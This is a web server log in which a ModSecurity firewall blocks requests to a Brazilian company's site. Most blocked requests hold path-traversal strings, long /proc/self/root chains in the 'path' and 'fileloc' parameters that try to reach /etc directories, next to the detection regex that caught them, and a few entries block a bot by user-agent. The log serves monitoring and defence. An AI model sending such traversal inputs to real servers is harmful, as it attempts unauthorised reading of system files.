[Wed Mar 18 05:41:53.180671 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:38710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplUda6ubjKNq_cu4Zi0gAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:41:54.522627 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:44366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplUvu8EFLIOrSqIpvS-gAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:42:11.005320 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:37336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplYymAPhZkrhU8w4k76gAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:42:24.863834 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:44372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplcOw_le52K8_3pV2t2gAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:42:27.775792 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.228.61:41468] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abplcwkwaGbbGflqUZDeTQAAAM4"]
[Wed Mar 18 05:42:28.309075 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.244.43:39792] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpldOyqAr6etmhZHNqIGwAAAEo"]
[Wed Mar 18 05:42:28.862626 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:42406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpldAkwaGbbGflqUZDeTwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:42:38.427530 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:47278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplfgkwaGbbGflqUZDeYAAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:42:39.743113 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:42572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplf0zinOy1jxa1j4fffwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:42:47.085435 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:42580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplh0zinOy1jxa1j4ffhAAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:42:50.150428 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:42584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplisdf6f5d65gmYZSe3gAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:42:56.527455 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:57690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplkNY0UrI5A3LftIxjxwAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:43:21.454831 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:52272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplqfu8EFLIOrSqIpvTRAAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:43:48.813485 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:51046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplxOyqAr6etmhZHNqIagAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:45:05.900578 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:58652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmEUzinOy1jxa1j4ffqgAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:45:30.653589 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:58668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmKuoXxyEfFpUF8f86LgAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:45:41.222299 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:36252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmNdY0UrI5A3LftIxj_AAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:46:12.197607 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:42412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmVEzinOy1jxa1j4ffxwAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:46:14.371659 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:60348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmVsdf6f5d65gmYZSfKgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:46:15.815785 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:46124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmV8df6f5d65gmYZSfKwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:46:20.989968 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:46138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmXPu8EFLIOrSqIpvTeQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:27.880186 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.228.61:58392] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpmnwkwaGbbGflqUZDesAAAANU"]
[Wed Mar 18 05:47:29.447545 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.244.43:37008] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpmofu8EFLIOrSqIpvTiQAAAkU"]
[Wed Mar 18 05:47:34.107766 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:55680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmpsdf6f5d65gmYZSfbAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
